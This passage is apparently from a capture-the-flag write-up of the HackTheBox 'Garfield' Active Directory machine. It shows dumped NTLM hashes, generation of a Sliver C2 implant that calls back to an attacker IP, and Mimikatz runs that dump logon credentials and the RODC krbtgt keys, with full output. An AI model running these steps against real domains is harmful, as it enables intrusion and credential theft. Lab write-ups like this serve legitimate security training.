Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt_8245:1603:aad3b435b51404eeaad3b435b51404ee:445aa4221e751da37a10241d962780e2:::
j.arbuckle:3101:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
l.wilson:3105:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
l.wilson_adm:3107:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
RODC01$:1602:aad3b435b51404eeaad3b435b51404ee:0a3f810964bb5e1f0e52245f73700172:::
DC02$:10601:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter &gt;</code></pre></div><p>But we&#8217;re not done, due to not Gaining the main Administartor account on DC01 machine.</p><ol start="9"><li><p><em>Plan Execution via KrbTGT RODC01</em></p></li></ol><p>So now, we look onto the RBCD execution on RODC01 as Administrator, we have out-bound object control on the uniqes krbTGT account.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!ZqvZ!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F543674cf-dc2b-4ac3-99c6-97af86b25bac_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!ZqvZ!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F543674cf-dc2b-4ac3-99c6-97af86b25bac_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!ZqvZ!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F543674cf-dc2b-4ac3-99c6-97af86b25bac_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!ZqvZ!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F543674cf-dc2b-4ac3-99c6-97af86b25bac_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!ZqvZ!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F543674cf-dc2b-4ac3-99c6-97af86b25bac_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!ZqvZ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F543674cf-dc2b-4ac3-99c6-97af86b25bac_1590x965.png" width="1456" height="884" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/543674cf-dc2b-4ac3-99c6-97af86b25bac_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:884,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:107523,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193328954?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F543674cf-dc2b-4ac3-99c6-97af86b25bac_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!ZqvZ!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F543674cf-dc2b-4ac3-99c6-97af86b25bac_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!ZqvZ!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F543674cf-dc2b-4ac3-99c6-97af86b25bac_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!ZqvZ!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F543674cf-dc2b-4ac3-99c6-97af86b25bac_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!ZqvZ!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F543674cf-dc2b-4ac3-99c6-97af86b25bac_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>The account sign ticket for only DC:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Zl1D!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F865ca7d2-5599-43ef-a227-b7ff09e3f1d9_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Zl1D!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F865ca7d2-5599-43ef-a227-b7ff09e3f1d9_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!Zl1D!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F865ca7d2-5599-43ef-a227-b7ff09e3f1d9_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!Zl1D!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F865ca7d2-5599-43ef-a227-b7ff09e3f1d9_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!Zl1D!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F865ca7d2-5599-43ef-a227-b7ff09e3f1d9_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Zl1D!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F865ca7d2-5599-43ef-a227-b7ff09e3f1d9_1590x965.png" width="1590" height="965" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/865ca7d2-5599-43ef-a227-b7ff09e3f1d9_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:965,&quot;width&quot;:1590,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:124044,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193328954?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0ac6913f-3b55-4225-be92-5138a48f4da9_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Zl1D!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F865ca7d2-5599-43ef-a227-b7ff09e3f1d9_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!Zl1D!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F865ca7d2-5599-43ef-a227-b7ff09e3f1d9_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!Zl1D!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F865ca7d2-5599-43ef-a227-b7ff09e3f1d9_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!Zl1D!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F865ca7d2-5599-43ef-a227-b7ff09e3f1d9_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>For specific dumping, I will use mimikatz, usually now I use Sliver for that.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!8Y70!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe8171b21-f828-4a04-a638-7e787450b470_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!8Y70!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe8171b21-f828-4a04-a638-7e787450b470_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!8Y70!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe8171b21-f828-4a04-a638-7e787450b470_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!8Y70!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe8171b21-f828-4a04-a638-7e787450b470_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!8Y70!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe8171b21-f828-4a04-a638-7e787450b470_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!8Y70!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe8171b21-f828-4a04-a638-7e787450b470_1590x965.png" width="1456" height="884" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/e8171b21-f828-4a04-a638-7e787450b470_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:884,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:138430,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193328954?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe8171b21-f828-4a04-a638-7e787450b470_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!8Y70!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe8171b21-f828-4a04-a638-7e787450b470_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!8Y70!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe8171b21-f828-4a04-a638-7e787450b470_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!8Y70!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe8171b21-f828-4a04-a638-7e787450b470_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!8Y70!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe8171b21-f828-4a04-a638-7e787450b470_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><ol start="10"><li><p><em>Sliver C2 and Mimikatz Loader</em></p></li></ol><p>Let&#8217;s create the agent and import it with our Administrator access via wmiexec.py:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo sliver-server

Sliver  Copyright (C) 2026  Bishop Fox
. . .[SNIP]. . .

Unpacking assets ...
                                                      
           &#9608;&#9608;&#9608;&#9608;&#9608;&#9608;  &#9608;&#9608;&#9619;     &#9608;&#9608;&#9619; &#9608;&#9608;&#9618;   &#9608;&#9619;&#9619;&#9608;&#9608;&#9608;&#9608;&#9608;  &#9608;&#9608;&#9600;&#9608;&#9608;&#9608; 
        &#9618;&#9608;&#9608;    &#9618; &#9619;&#9608;&#9608;&#9618;    &#9619;&#9608;&#9608;&#9618;&#9619;&#9608;&#9608;&#9617;   &#9608;&#9618;&#9619;&#9608;   &#9600; &#9619;&#9608;&#9608; &#9618; &#9608;&#9608;&#9618;
        &#9617; &#9619;&#9608;&#9608;&#9604;   &#9618;&#9608;&#9608;&#9617;    &#9618;&#9608;&#9608;&#9618; &#9619;&#9608;&#9608;  &#9608;&#9618;&#9617;&#9618;&#9608;&#9608;&#9608;   &#9619;&#9608;&#9608; &#9617;&#9604;&#9608; &#9618;
          &#9618;   &#9608;&#9608;&#9618;&#9618;&#9608;&#9608;&#9617;    &#9617;&#9608;&#9608;&#9617;  &#9618;&#9608;&#9608; &#9608;&#9617;&#9617;&#9618;&#9619;&#9608;  &#9604; &#9618;&#9608;&#9608;&#9600;&#9600;&#9608;&#9604;  
        &#9618;&#9608;&#9608;&#9608;&#9608;&#9608;&#9608;&#9618;&#9618;&#9617;&#9608;&#9608;&#9608;&#9608;&#9608;&#9608;&#9618;&#9617;&#9608;&#9608;&#9617;   &#9618;&#9600;&#9608;&#9617;  &#9617;&#9618;&#9608;&#9608;&#9608;&#9608;&#9618;&#9617;&#9608;&#9608;&#9619; &#9618;&#9608;&#9608;&#9618;
        &#9618; &#9618;&#9619;&#9618; &#9618; &#9617;&#9617; &#9618;&#9617;&#9619;  &#9617;&#9617;&#9619;     &#9617; &#9616;&#9617;  &#9617;&#9617; &#9618;&#9617; &#9617;&#9617; &#9618;&#9619; &#9617;&#9618;&#9619;&#9617;
        &#9617; &#9617;&#9618;  &#9617; &#9617;&#9617; &#9617; &#9618;  &#9617; &#9618; &#9617;   &#9617; &#9617;&#9617;   &#9617; &#9617;  &#9617;  &#9617;&#9618; &#9617; &#9618;&#9617;
        &#9617;  &#9617;  &#9617;    &#9617; &#9617;    &#9618; &#9617;     &#9617;&#9617;     &#9617;     &#9617;&#9617;   &#9617; 
              &#9617;      &#9617;  &#9617; &#9617;        &#9617;     &#9617;  &#9617;   &#9617;     
                                                      
All hackers gain deathtouch
[server] sliver &gt; [*] Server v0.0.0 - 
[*] Welcome to the sliver shell, please type 'help' for options

[server] sliver &gt; generate --mtls 10.10.14.30:9002 --os windows --arch amd64 --format exe --save agent.exe

[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 1m52s
[*] Implant saved to /home/kali/Documents/train/htb/garfield/agent.exe

[server] sliver &gt; mtls --lhost 10.10.14.30 --lport 9002

[*] Starting mTLS listener ...
[server] sliver &gt; 
[*] Successfully started job #1



[*] Session be2cb48a INTEGRAL_RISK - 10.129.195.37:49855 (RODC01) - windows/amd64 - Mon, 06 Apr 2026 03:35:20 EDT


[server] sliver &gt; sessions

 ID         Transport   Remote Address        Hostname   Username                 Operating System   Health  
========== =========== ===================== ========== ======================== ================== =========
 be2cb48a   mtls        10.129.195.37:49855   RODC01     GARFIELD\Administrator   windows/amd64      [ALIVE] 

[server] sliver &gt; use be2cb48a

[*] Active session INTEGRAL_RISK (be2cb48a-6107-498a-959d-087eaa9f8da1)

[server] sliver (INTEGRAL_RISK) &gt; whoami

Logon ID: GARFIELD\Administrator
[*] Current Token ID: GARFIELD\Administrator</code></pre></div><p>Mimikatz:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">[server] sliver (INTEGRAL_RISK) &gt; mimikatz "token::elevate privilege::debug sekurlsa::logonpasswords exit"

[*] Successfully executed mimikatz
[*] Got output:

  .#####.   mimikatz 2.2.0 (x64) #19041 May 17 2024 22:19:06
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       &gt; https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        &gt; https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # token::elevate
Token Id  : 0
User name : 
SID name  : NT AUTHORITY\SYSTEM

536     {0;000003e7} 1 D 20129          NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Primary
 -&gt; Impersonated !
 * Process Token : {0;0019b535} 0 D 1713299     GARFIELD\Administrator  S-1-5-21-2502726253-3859040611-225969357-500      (15g,26p)       Primary
 * Thread Token  : {0;000003e7} 1 D 1840878     NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Impersonation (Delegation)

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # sekurlsa::logonpasswords

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : RODC01$
Domain            : GARFIELD
Logon Server      : (null)
Logon Time        : 4/6/2026 6:13:02 AM
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username : RODC01$
         * Domain   : GARFIELD
         * NTLM     : 0a3f810964bb5e1f0e52245f73700172
         * SHA1     : 67dc5a36324b72a396de29a35b03441c62c63970
         * DPAPI    : 67dc5a36324b72a396de29a35b03441c
        tspkg :
        wdigest :
         * Username : RODC01$
         * Domain   : GARFIELD
         * Password : (null)
        kerberos :
         * Username : rodc01$
         * Domain   : GARFIELD.HTB
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 24091 (00000000:00005e1b)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 4/6/2026 6:12:59 AM
SID               : 
        msv :
         [00000003] Primary
         * Username : RODC01$
         * Domain   : GARFIELD
         * NTLM     : 0a3f810964bb5e1f0e52245f73700172
         * SHA1     : 67dc5a36324b72a396de29a35b03441c62c63970
         * DPAPI    : 67dc5a36324b72a396de29a35b03441c
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 4/6/2026 6:13:02 AM
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 26925 (00000000:0000692d)
Session           : Interactive from 0
User Name         : UMFD-0
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 4/6/2026 6:13:01 AM
SID               : S-1-5-96-0-0
        msv :
         [00000003] Primary
         * Username : RODC01$
         * Domain   : GARFIELD
         * NTLM     : 0a3f810964bb5e1f0e52245f73700172
         * SHA1     : 67dc5a36324b72a396de29a35b03441c62c63970
         * DPAPI    : 67dc5a36324b72a396de29a35b03441c
        tspkg :
        wdigest :
         * Username : RODC01$
         * Domain   : GARFIELD
         * Password : (null)
        kerberos :
         * Username : RODC01$
         * Domain   : garfield.htb
         * Password : ab b9 15 b0 b3 c6 d3 2c ce ef 0f fb dc 3b 11 27 fd 34 b7 3d 3e 19 aa 02 5c f4 80 01 ae 8c d7 4a a7 85 ce 92 b7 c2 a4 71 e3 77 97 c8 f4 0b e1 4e 8d ac 75 9d 95 ff b3 bd 82 c5 f5 4b f0 30 6c 25 14 30 2b c1 f6 9a d8 8c 4d d3 cd 45 33 98 cc de 0d e0 fe ee 82 f7 a3 f4 d8 ac 62 33 7a 52 32 46 ab 88 b8 1f ef 57 bc c1 35 2b 73 7b 5c a2 63 21 b8 e0 1e 89 24 01 a3 32 83 bd e8 76 7f ed 76 37 09 40 c0 27 81 e6 bb 38 3b df 63 09 a1 f0 49 ce ef f7 42 e3 92 cc 68 d0 e9 03 d9 3b 83 93 91 6e 20 06 4f df fa 3e 7f 6b ad 9c 99 eb ef 4a 24 f1 d5 7f c9 c9 d2 95 b0 a0 05 2c 56 60 6b 90 45 71 67 a8 fa 0f e9 c6 51 08 42 e0 33 41 fd 15 7f c1 36 3d 2d 0c a2 cd d6 c5 3c 87 30 70 86 cd 0a e3 70 f1 62 fe 4b d3 cf 1e 8a 36 6c fd a8 eb 12 5d 
        ssp :
        credman :

Authentication Id : 0 ; 26768 (00000000:00006890)
Session           : Interactive from 1
User Name         : UMFD-1
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 4/6/2026 6:13:01 AM
SID               : S-1-5-96-0-1
        msv :
         [00000003] Primary
         * Username : RODC01$
         * Domain   : GARFIELD
         * NTLM     : 0a3f810964bb5e1f0e52245f73700172
         * SHA1     : 67dc5a36324b72a396de29a35b03441c62c63970
         * DPAPI    : 67dc5a36324b72a396de29a35b03441c
        tspkg :
        wdigest :
         * Username : RODC01$
         * Domain   : GARFIELD
         * Password : (null)
        kerberos :
         * Username : RODC01$
         * Domain   : garfield.htb
         * Password : ab b9 15 b0 b3 c6 d3 2c ce ef 0f fb dc 3b 11 27 fd 34 b7 3d 3e 19 aa 02 5c f4 80 01 ae 8c d7 4a a7 85 ce 92 b7 c2 a4 71 e3 77 97 c8 f4 0b e1 4e 8d ac 75 9d 95 ff b3 bd 82 c5 f5 4b f0 30 6c 25 14 30 2b c1 f6 9a d8 8c 4d d3 cd 45 33 98 cc de 0d e0 fe ee 82 f7 a3 f4 d8 ac 62 33 7a 52 32 46 ab 88 b8 1f ef 57 bc c1 35 2b 73 7b 5c a2 63 21 b8 e0 1e 89 24 01 a3 32 83 bd e8 76 7f ed 76 37 09 40 c0 27 81 e6 bb 38 3b df 63 09 a1 f0 49 ce ef f7 42 e3 92 cc 68 d0 e9 03 d9 3b 83 93 91 6e 20 06 4f df fa 3e 7f 6b ad 9c 99 eb ef 4a 24 f1 d5 7f c9 c9 d2 95 b0 a0 05 2c 56 60 6b 90 45 71 67 a8 fa 0f e9 c6 51 08 42 e0 33 41 fd 15 7f c1 36 3d 2d 0c a2 cd d6 c5 3c 87 30 70 86 cd 0a e3 70 f1 62 fe 4b d3 cf 1e 8a 36 6c fd a8 eb 12 5d 
        ssp :
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : RODC01$
Domain            : GARFIELD
Logon Server      : (null)
Logon Time        : 4/6/2026 6:12:58 AM
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : RODC01$
         * Domain   : GARFIELD
         * Password : (null)
        kerberos :
         * Username : rodc01$
         * Domain   : GARFIELD.HTB
         * Password : (null)
        ssp :
        credman :

mimikatz(commandline) # exit
Bye!</code></pre></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">[server] sliver (INTEGRAL_RISK) &gt; mimikatz "token::elevate" "privilege::debug" "lsadump::lsa /inject /name:krbtgt_8245" "exit"

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       &gt; https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        &gt; https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # token::elevate
Token Id  : 0
. . .[SNIP]. . .

 * Kerberos-Newer-Keys
    Default Salt : GARFIELD.HTBkrbtgt_8245
    Default Iterations : 4096
    Credentials
